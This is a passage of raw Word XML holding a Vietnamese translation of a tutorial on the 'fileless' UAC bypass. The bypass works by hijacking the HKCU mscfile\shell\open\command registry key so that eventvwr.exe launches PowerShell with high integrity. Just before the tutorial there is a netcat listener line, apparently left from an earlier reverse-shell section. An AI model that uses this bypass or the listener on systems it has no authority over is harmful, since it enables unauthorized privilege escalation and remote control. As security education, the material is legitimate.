        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nc -lnvv -p 1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B0C67D" w14:textId="36BB84C0" w:rsidR="00BC5F95" w:rsidRDefault="00BC5F95">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52E07D56" w14:textId="77777777" w:rsidR="00BC5F95" w:rsidRDefault="00BC5F95">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E6D92A0" w14:textId="6C9EC29D" w:rsidR="00BC519B" w:rsidRDefault="00BC519B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="219CED9C" w14:textId="604E779E" w:rsidR="00BC519B" w:rsidRPr="00BC519B" w:rsidRDefault="00BC519B" w:rsidP="00BC519B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC519B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>“Fileless” UAC Bypass Using Eventvwr.exe và Registry Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4FC9A8" w14:textId="38F80308" w:rsidR="00BC519B" w:rsidRDefault="00BC519B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D990AF2" w14:textId="77777777" w:rsidR="00BC519B" w:rsidRDefault="00BC519B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C3D8A17" w14:textId="56BC6DC1" w:rsidR="00C611E9" w:rsidRDefault="00BC519B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sau khi đào sâu vào Windows 10 và khám phá 1 phương pháp khá thú vị để bypass user account control, tôi quyết định dành một ít thời gian điều tra các kĩ thuật khác liên quan UAC. Gần đây, có nhiều kĩ thuật bypass UAC đã được public, đa số yêu cầu đặc quyền sao chép file dùng đối tượng</w:t>
      </w:r>
      <w:r w:rsidR="00B7682E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> IFileOperation COM hoặc WUSA extraction (Windows 7) để  tận dụng khả năng tấn công DLL trong 1 vị trí đã được bảo vệ. Tất cả kĩ thuật trên yêu cầu thả 1 tập tin vào ổ đĩa (ví dụ, đặt 1 DLL trên ổ đĩa để tấn công DLL). Bạn có thể xem các kĩ thuật ở </w:t>
      </w:r>
      <w:r w:rsidR="00E46B52">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">trang </w:t>
      </w:r>
      <w:r w:rsidR="00E46B52" w:rsidRPr="00E46B52">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https://github.com/hfiref0x/UACME</w:t>
      </w:r>
      <w:r w:rsidR="00E46B52">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Kĩ thuật bạn được học ở bài viết này khác với những phương pháp trên và cung cấp 1 kĩ thuật mới không dựa vào đặc quyền sao chép files, code injection hay đặt 1 tệp gốc trong ổ đĩa (như dll). Kĩ thuật này đã được thử trên Windows 7 và Windows 10, nhưng mong đợi hoạt động trên tất cả phiên bản của Windows thực thi UAC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CB65EC" w14:textId="3711DC49" w:rsidR="00E46B52" w:rsidRDefault="00E46B52">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="433CB649" w14:textId="2A4BC566" w:rsidR="00E46B52" w:rsidRDefault="00E46B52">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Như tôi đã đề cập trong bài viết trước: bypassing UAC bằng Disk Cleanup, 1 kĩ thuật phổ biến điều tra hành vi loading trên Windows là dùng SysInternals Process Monitor để phân tích cách 1 tiến trình hoạt động khi thực thi. Trong khi đào sâu vào Windows Event Log với ProcMon được mở, tôi để ý thấy eventvwr.exe đang thực thi một </w:t>
      </w:r>
      <w:r w:rsidR="006A50AC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>số</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> truy vấn registry </w:t>
      </w:r>
      <w:r w:rsidR="006A50AC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>đối với HKEY_CURRENT_USER hive như 1 tiến trình có tính toàn vẹn cao.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E0AE93" w14:textId="4196130C" w:rsidR="006A50AC" w:rsidRDefault="006A50AC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35657E70" w14:textId="4719E7FC" w:rsidR="006A50AC" w:rsidRDefault="006A50AC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Trước khi đào sâu hơn, điều quan trọng  phải hiểu HKEY_CLASSES_ROOT (HKCR) và HKEY_CURRENT_USER (HKCU) registry hives là gì và cách chúng tương tác với </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>nhau. HKCR hive chỉ đơn giản là 1 sự kết hợp của HKLM:\Software\Class</w:t>
      </w:r>
      <w:r w:rsidR="00C86D7C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">s và HKCU: \Software\Classes. Bạn có thể đọc thêm về HKCR và tại sao HKLM và HKCU hives </w:t>
      </w:r>
      <w:r w:rsidR="00823798">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>được hợp nhất. Vì các hives này được hợp nhất, bạn có thể thường xuyên chiếm đoạt chìa khóa trong HKCR:\ bằng cách tạo chúng trong HKCU:\Sofrware\Classes. Vì mối quan hệ tồn tại giữa 2 hives này, bất cứ tiến trình nào nâng cao mà tương tác với cả HKCU và HKCR liên tiếp thường rất thú vị vì bạn có thể giả mạo các giá trị trong HKCU. Là 1 người dùng thông thường, bạn có thể ghi các chìa khóa trong HKCU; nếu 1 tiến trình nâng cao tương tác với các khóa mà bạn có thể tận dụng, bạn có khả năng can thiệp vào các hành động mà tiến trình</w:t>
      </w:r>
      <w:r w:rsidR="0099621C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> có tính toàn vẹn cao đang cố gắng thực hiện.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E58D55" w14:textId="4C6BC71A" w:rsidR="00C86D7C" w:rsidRDefault="00C86D7C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D9DDB90" w14:textId="09670080" w:rsidR="005D7186" w:rsidRPr="005D7186" w:rsidRDefault="00C86D7C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Có một số tệp nhị phân của Micorsoft tự động nâng cao do biểu hiện của chúng. Bạn có thể đọc thêm về các tệp nhị phân và các biểu hiện ở đây. Bằng  công cụ SysInternals “sigcheck”, tôi đã xác định</w:t>
      </w:r>
      <w:r w:rsidR="005D7186">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> được</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> eventvwr.exe tự động nâng cao do biểu hiện của nó.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A95E96" w14:textId="4F8AF3E2" w:rsidR="00814345" w:rsidRDefault="005D7186">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C95CD00" wp14:editId="2E518BA5">
            <wp:extent cx="5943600" cy="25628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5">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2562860"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BB0696" w14:textId="41F86808" w:rsidR="005D7186" w:rsidRDefault="005D7186">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C8EF4B8" w14:textId="079F57A1" w:rsidR="0044333F" w:rsidRDefault="0044333F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Trong khi đào sâu hơn đầu ra của ProcMon, tôi để ý thấy eventvwr.exe tương tác với </w:t>
      </w:r>
      <w:r w:rsidRPr="0044333F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HKCU\Software\Classes\mscfile\shell\open\command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> dẫn đến kết quả “Name not found”. Sau đó, eventvwr.exe tương tác với key </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BBD5F1" w14:textId="453C60F5" w:rsidR="005D7186" w:rsidRDefault="0044333F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HKCR</w:t>
      </w:r>
      <w:r w:rsidRPr="0044333F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>\mscfile\shell\open\command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, tôi nhận thấy rằng  giá trị mặc định được đặt thành lệnh mmc.exe (microsoft management console), 1 chương trình chịu trách nhiệm tải Management Snap-Ins:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38606CDF" w14:textId="663D86FE" w:rsidR="0044333F" w:rsidRDefault="0044333F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6170B243" w14:textId="2843EA4B" w:rsidR="0044333F" w:rsidRDefault="00264DD9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="130E94C2" wp14:editId="05D3C547">
            <wp:extent cx="5943600" cy="34753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a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3475355"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="508018BE" w14:textId="5D42153D" w:rsidR="00264DD9" w:rsidRDefault="00264DD9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B35B002" w14:textId="486D48EF" w:rsidR="00264DD9" w:rsidRDefault="00264DD9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kết luận, eventvwr.exe là 1 tiến trình có tính toàn vẹn cao truy vấn cả HKCU và HKCR registry hives để bắt đầu mmc.exe. Sau khi mmc.exe bắt đầu, nó mở eventvwr.msc, là tệp Microsoft Saved Console, chay Event Viewer. Điều này hợp lý vì Microsoft Management Console (mmc.exe) tải các tệp Microsoft Saved Console (.msc)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2393DF8E" w14:textId="7AF3FF2F" w:rsidR="00264DD9" w:rsidRDefault="00264DD9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D919B8B" w14:textId="6B73F075" w:rsidR="00264DD9" w:rsidRDefault="00264DD9" w:rsidP="00E67E65">
      <w:pPr>
        <w:ind w:right="-421"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tôi quyết định tạo 1 cấu trúc registry cho eventvwr.exe để truy vấn thành công đến vị trí HKCU thay vì HKCR</w:t>
      </w:r>
      <w:r w:rsidR="00E67E65">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Vì giá trị mặc định đặt ở </w:t>
      </w:r>
      <w:r w:rsidR="00E67E65" w:rsidRPr="00E67E65">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HKCR\mscfile\shell\open\command</w:t>
      </w:r>
      <w:r w:rsidR="00E67E65">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> chứa 1 tệp thực thi, tôi quyết định thay thế tệp thực thi với powershell.exe:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DCB5DC" w14:textId="03398E6B" w:rsidR="00E67E65" w:rsidRDefault="00E67E65" w:rsidP="00E67E65">
      <w:pPr>
        <w:ind w:right="-421"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52195C03" w14:textId="63B255DF" w:rsidR="00E67E65" w:rsidRDefault="00E67E65" w:rsidP="00E67E65">
      <w:pPr>
        <w:ind w:right="-421"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78D072A7" wp14:editId="3967F1C1">
            <wp:extent cx="5943600" cy="31756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a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3175635"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B954745" w14:textId="7BCA223E" w:rsidR="00E67E65" w:rsidRDefault="00E67E65" w:rsidP="00E67E65">
      <w:pPr>
        <w:ind w:right="-421"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1490A82D" w14:textId="2189C397" w:rsidR="00E67E65" w:rsidRDefault="00E67E65" w:rsidP="00E67E65">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Khi khởi động eventvwr.exe, tôi để ý thấy truy vấn </w:t>
      </w:r>
      <w:r w:rsidRPr="00E67E65">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HKCU\Software\Classes\mscfile\shell\open\command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> thành công:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2129E8" w14:textId="3C519002" w:rsidR="00E67E65" w:rsidRDefault="00E67E65" w:rsidP="00E67E65">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="200E77B1" w14:textId="227766E3" w:rsidR="00E67E65" w:rsidRDefault="00E67E65" w:rsidP="00E67E65">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F6100C9" wp14:editId="09F54C29">
            <wp:extent cx="5943600" cy="7524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8">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="752475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B2C976" w14:textId="4F1369CB" w:rsidR="00E67E65" w:rsidRDefault="00E67E65" w:rsidP="00E67E65">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36CE79B9" w14:textId="63FFC150" w:rsidR="00E67E65" w:rsidRDefault="00546824" w:rsidP="00E67E65">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidR="00E67E65">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ó khởi động </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>powershell.exe thay cho mmc.exe:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28977722" w14:textId="65A7FAA5" w:rsidR="00546824" w:rsidRDefault="00546824" w:rsidP="00E67E65">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39507DAE" wp14:editId="0D03611B">
            <wp:extent cx="5943600" cy="5092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9">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="509270"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="78476AF3" w14:textId="21325555" w:rsidR="00546824" w:rsidRDefault="00546824" w:rsidP="00E67E65">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="230067E9" w14:textId="37E29145" w:rsidR="00546824" w:rsidRDefault="0078004F" w:rsidP="00E67E65">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nhìn Process Explorer, tôi có thể xác nhận powershell.exe đang chạy với tính toàn vẹn cao.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EBCCD3" w14:textId="361D7C71" w:rsidR="0078004F" w:rsidRDefault="0078004F" w:rsidP="00E67E65">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="243BC0F6" w14:textId="3826318C" w:rsidR="0078004F" w:rsidRDefault="0078004F" w:rsidP="00E67E65">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35CDF6F8" wp14:editId="02094199">
            <wp:extent cx="5943600" cy="3581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0">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="358140"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
